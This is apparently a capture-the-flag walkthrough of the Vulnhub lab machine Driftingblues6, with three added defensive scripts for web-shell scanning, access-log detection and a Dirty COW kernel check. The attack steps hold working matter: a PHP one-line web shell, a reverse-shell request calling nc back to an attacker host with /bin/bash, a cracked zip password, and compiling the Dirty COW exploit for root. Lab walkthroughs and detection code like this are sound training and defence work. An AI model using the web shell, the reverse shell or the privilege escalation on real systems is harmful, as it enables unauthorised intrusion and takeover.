Target Machine Pentest Walkthrough - Vulnhub - Driftingblues6

Host discovery

nmap 222.24.6.0/24

The target is found at 222.24.6.219; the output is:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 16:43 CST 
Nmap scan report for 222.24.6.219
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http

Run a detailed scan of all ports:

nmap -sV -A -p- -T4 222.24.6.219

Only port 80 is open:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 16:48 CST
Nmap scan report for 222.24.6.219
Host is up (0.000042s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds

HTTP

Directory enumeration:

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://222.24.6.219/ -x php,txt,html -e

Output:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://222.24.6.219/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://222.24.6.219/.html (Status: 403) [Size: 285]
http://222.24.6.219/index (Status: 200) [Size: 750]
http://222.24.6.219/.php (Status: 403) [Size: 284]
http://222.24.6.219/index.html (Status: 200) [Size: 750]
http://222.24.6.219/db (Status: 200) [Size: 53656]
http://222.24.6.219/robots (Status: 200) [Size: 110]
http://222.24.6.219/robots.txt (Status: 200) [Size: 110]
http://222.24.6.219/spammer (Status: 200) [Size: 179]
http://222.24.6.219/.html (Status: 403) [Size: 285]
http://222.24.6.219/.php (Status: 403) [Size: 284]
http://222.24.6.219/server-status (Status: 403) [Size: 293]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

There is a robots.txt, which reveals /textpattern/textpattern/. Fuzz for .zip files:

wfuzz -u http://222.24.6.219/FUZZ.zip -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --sc 200,301

Output:

 /home/monoceros406/.local/lib/python3.11/site-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://222.24.6.219/FUZZ.zip
Total requests: 220560

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 200 75 L 75 W 750 Ch "# directory-list-2.3-medium.txt"
000000007: 200 75 L 75 W 750 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000003: 200 75 L 75 W 750 Ch "# Copyright 2007 James Fisher"
000000013: 200 75 L 75 W 750 Ch "#"
000000010: 200 75 L 75 W 750 Ch "#"
000000012: 200 75 L 75 W 750 Ch "# on at least 2 different hosts"
000000009: 200 75 L 75 W 750 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000011: 200 75 L 75 W 750 Ch "# Priority ordered case-sensitive list, where entries were found"
000000006: 200 75 L 75 W 750 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000005: 200 75 L 75 W 750 Ch "# This work is licensed under the Creative Commons"
000000008: 200 75 L 75 W 750 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000002: 200 75 L 75 W 750 Ch "#"
000000004: 200 75 L 75 W 750 Ch "#"
000008517: 200 1 L 9 W 177 Ch "spammer"

Total time: 0
Processed Requests: 220560
Filtered Requests: 220546
Requests/sec.: 0

Download spammer.zip and try to crack its password:

zip2john spammer.zip >hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

The password is myspace4:

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 32 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4 (spammer.zip/creds.txt)
1g 0:00:00:00 DONE (2024-03-19 17:00) 33.33g/s 2184Kp/s 2184Kc/s 2184KC/s 123456..sabrina7
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

After extracting, creds.txt contains mayer:lionheart. Log in to the /textpattern/textpattern admin panel; the bottom-left corner shows "Textpattern CMS v4.8.3".

Textpattern

Search for a usable exploit:

searchsploit Textpattern

Result:

TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated) | php/webapps/48943.py

Copy the exploit:

cp /usr/share/exploitdb/exploits/php/webapps/48943.py ~

But none of that is actually needed: in the Textpattern admin panel's Files module, simply upload a PHP one-line web shell as 1.php:

<?php
system($_GET["cmd"]);
?>
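The upload step above is the point a defender can catch on disk: an upload directory of a CMS should hold documents, never PHP. The following script is an added example written for this write-up, not part of the original post or of Textpattern itself. It walks an upload directory and flags files by script extension, by a script extension hidden inside the name, and by content signatures typical of a minimal web shell (the same `system($_GET[...])` pattern used on this page). The extension list and signatures are assumptions, and the sample directory it builds is constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Extensions the web server would hand to a PHP interpreter (assumed list).
SCRIPT_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".phps"}

# Content signatures of a minimal PHP web shell: an opening tag, a command-execution
# or eval call, and request input read straight from $_GET/$_POST.
SHELL_SIGNATURES = [
    re.compile(rb"<\?php"),
    re.compile(rb"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
    re.compile(rb"\beval\s*\("),
    re.compile(rb"\$_(GET|POST|REQUEST)\s*\["),
]


def inspect_file(path: Path) -> list:
    """Return the reasons a single file looks like an uploaded script (empty if none)."""
    reasons = []
    if path.suffix.lower() in SCRIPT_EXTENSIONS:
        reasons.append(f"script extension {path.suffix}")
    # Double extensions such as shell.php.jpg are a classic filter bypass.
    if any(s.lower() in SCRIPT_EXTENSIONS for s in path.suffixes[:-1]):
        reasons.append("script extension hidden inside the name")
    head = path.read_bytes()[:65536]  # the signatures sit at the top of a shell
    for sig in SHELL_SIGNATURES:
        if sig.search(head):
            reasons.append(f"content matches {sig.pattern.decode()}")
    return reasons


def scan_upload_dir(root) -> dict:
    """Walk an upload directory and map suspicious relative paths to their reasons."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            reasons = inspect_file(path)
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings


def build_demo_dir() -> Path:
    """Constructed sample files, not taken from the target: a benign PDF, the page's
    one-liner saved as 1.php, and a .txt that hides PHP code behind a harmless name."""
    root = Path(tempfile.mkdtemp(prefix="textpattern_files_"))
    (root / "report.pdf").write_bytes(b"%PDF-1.4\n%%EOF\n")
    (root / "1.php").write_text('<?php\nsystem($_GET["cmd"]);\n?>\n')
    (root / "notes.txt").write_text("meeting notes\n<?php eval($_POST['x']); ?>\n")
    return root


if __name__ == "__main__":
    for name, reasons in scan_upload_dir(build_demo_dir()).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Run it against the CMS's real files directory on a schedule; the content check matters more than the extension check, because a renamed shell still contains the same tokens. Pair it with a web-server rule that disables script execution under the upload directory so that even a missed file cannot run.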

Then visit:

http://222.24.6.219/textpattern/files/1.php?cmd=whoami

The command output is returned successfully. Start a listener on port 8989 locally:

nc -lvvp 8989

Trigger the reverse shell:

http://222.24.6.219/textpattern/files/1.php?cmd=nc%20222.24.6.149%208989%20-e%20%2Fbin%2Fbash
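Everything from the gobuster and wfuzz runs above through the two web-shell requests lands in the Apache access log, so this is where the whole chain can be detected. The script below is an added example for this write-up, not code from the original post. It parses Apache combined-format lines and raises alerts for scanner User-Agent strings, a burst of 404 responses from one client, any PHP file requested under the Textpattern files directory, and query-parameter values that look like shell commands. The scanner marker list (the gobuster value comes from the scan output on this page; the Wfuzz default User-Agent is an assumption), the thresholds and the sample log lines are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Substrings of default User-Agent strings sent by common scanners (assumed list).
SCANNER_UA_MARKERS = ("gobuster", "wfuzz", "dirbuster", "nikto", "sqlmap")

# Textpattern's file-upload directory as used on this page; nothing there should execute.
UPLOAD_DIR = "/textpattern/files/"
SCRIPT_SUFFIXES = (".php", ".php5", ".phtml", ".phar")

# Shell-like content inside a decoded query-parameter value.
SHELL_TOKENS = re.compile(r"(^|[\s;|&])(nc|bash|sh|whoami|id|wget|curl|python)(\s|$)|/bin/")


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(lines, min_requests=20, not_found_ratio=0.8):
    """Return (ip, rule, detail) alerts for scanner UAs, 404 bursts, PHP requests
    inside the upload directory and command-looking parameter values."""
    alerts = []
    per_ip = defaultdict(lambda: {"total": 0, "404": 0})
    seen_scanner = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        per_ip[ip]["total"] += 1
        if rec["status"] == "404":
            per_ip[ip]["404"] += 1
        ua = rec["ua"]
        if any(m in ua.lower() for m in SCANNER_UA_MARKERS) and (ip, ua) not in seen_scanner:
            seen_scanner.add((ip, ua))  # one alert per client/tool pair, not per request
            alerts.append((ip, "scanner-user-agent", ua))
        url = urlsplit(rec["target"])
        path = unquote(url.path)
        if path.startswith(UPLOAD_DIR) and path.lower().endswith(SCRIPT_SUFFIXES):
            alerts.append((ip, "script-in-upload-dir", path))
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if SHELL_TOKENS.search(value):
                alerts.append((ip, "command-in-parameter", f"{key}={value}"))
    for ip, c in per_ip.items():
        if c["total"] >= min_requests and c["404"] / c["total"] >= not_found_ratio:
            alerts.append((ip, "404-burst", f"{c['404']}/{c['total']} requests returned 404"))
    return alerts


def sample_log():
    """Constructed access-log lines modelled on the activity in this write-up; they are
    not real server logs. 222.24.6.149 is the attacking host used on the page."""
    def entry(ip, target, status, size, ua, sec):
        return (f'{ip} - - [19/Mar/2024:16:50:{sec:02d} +0800] '
                f'"GET {target} HTTP/1.1" {status} {size} "-" "{ua}"')
    attacker = "222.24.6.149"
    browser = "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
    lines = [entry(attacker, f"/word{i}", 404, 285, "gobuster/3.6", i) for i in range(22)]
    lines.append(entry(attacker, "/index.html", 200, 750, "gobuster/3.6", 22))
    lines.append(entry(attacker, "/robots.txt", 200, 110, "gobuster/3.6", 23))
    lines.append(entry(attacker, "/spammer.zip", 200, 179, "Wfuzz/3.1.0", 24))
    lines.append(entry(attacker, "/textpattern/files/1.php?cmd=whoami", 200, 9, browser, 25))
    lines.append(entry(attacker, "/textpattern/files/1.php?cmd=nc%20222.24.6.149%208989%20-e%20%2Fbin%2Fbash",
                       200, 0, browser, 26))
    lines.append(entry("222.24.6.50", "/", 200, 750, browser, 27))
    return lines


if __name__ == "__main__":
    for ip, rule, detail in analyse(sample_log()):
        print(f"{ip} {rule}: {detail}")
```

The User-Agent rule is the weakest of the four, since a scanner can set any string; the 404 ratio and the "script requested under an upload directory" rule do not depend on the client being honest, and the last one alone would have caught both web-shell requests on this page.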

Once the connection comes back locally, get a proper prompt:

script /dev/null -c bash

Privilege escalation

Check the kernel version:

uname -a

The output shows a kernel that Dirty COW (40616.c) can exploit:

Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux

Start an Apache2 server locally, then download, compile and run the exploit on the target:

wget http://222.24.6.149/40616.c
gcc 40616.c -o exp -pthread
chmod +x ./exp
./exp
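The escalation works only because the kernel package is older than the Dirty COW fix, which a fleet inventory check can find from the same `uname -a` line. The script below is an added example for this write-up, not part of the original post or of any Debian tooling. It extracts the Debian package version embedded in `uname -a` output, compares it dpkg-style against a reference fixed version, and reports vulnerable, patched or unknown. The fixed version in the table is an assumption (wheezy's fix for CVE-2016-5195 in linux 3.2.82-1) and should be confirmed against the distribution advisory before the table is relied on.

```python
import re

# Reference fixed version per Debian kernel series. Assumption: the Debian wheezy fix for
# CVE-2016-5195 (Dirty COW) shipped in linux 3.2.82-1; confirm against the distribution
# advisory for the release you are checking before relying on this table.
FIXED_DEBIAN_KERNEL = {"3.2": "3.2.82-1"}

# The Debian package version is embedded in `uname -a` output, e.g. "... Debian 3.2.78-1 x86_64".
UNAME_RE = re.compile(r"\bDebian (\d+(?:\.\d+)+-\d+(?:\+deb\d+u\d+)?)")
VERSION_RE = re.compile(r"(\d+(?:\.\d+)+)-(\d+)(?:\+deb(\d+)u(\d+))?")


def version_key(version):
    """Turn '3.2.78-1' or '3.2.82-1+deb7u1' into a tuple that compares like dpkg would
    for these simple cases (upstream version, Debian revision, +debXuY suffix)."""
    m = VERSION_RE.fullmatch(version)
    if m is None:
        raise ValueError(f"unrecognised Debian kernel version: {version!r}")
    upstream = tuple(int(x) for x in m.group(1).split("."))
    revision = int(m.group(2))
    suffix = (int(m.group(3)), int(m.group(4))) if m.group(3) else (0, 0)
    return (upstream, revision, suffix)


def debian_kernel_version(uname_output):
    """Return the Debian package version from a `uname -a` line, or None if absent."""
    m = UNAME_RE.search(uname_output)
    return m.group(1) if m else None


def dirty_cow_status(uname_output):
    """'vulnerable', 'patched' or 'unknown' (non-Debian kernel or a series not in the table)."""
    version = debian_kernel_version(uname_output)
    if version is None:
        return "unknown"
    series = ".".join(version.split(".")[:2])
    fixed = FIXED_DEBIAN_KERNEL.get(series)
    if fixed is None:
        return "unknown"
    return "patched" if version_key(version) >= version_key(fixed) else "vulnerable"


if __name__ == "__main__":
    # The uname line captured on the target in this write-up.
    print(dirty_cow_status("Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux"))
```

The check deliberately answers "unknown" rather than guessing when the kernel is not Debian-packaged or the series is not in the table; a version-string check is a triage aid, and the authoritative answer is the package manager's own security status on the host.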

Privilege escalation succeeded.

cat /root/flag.txt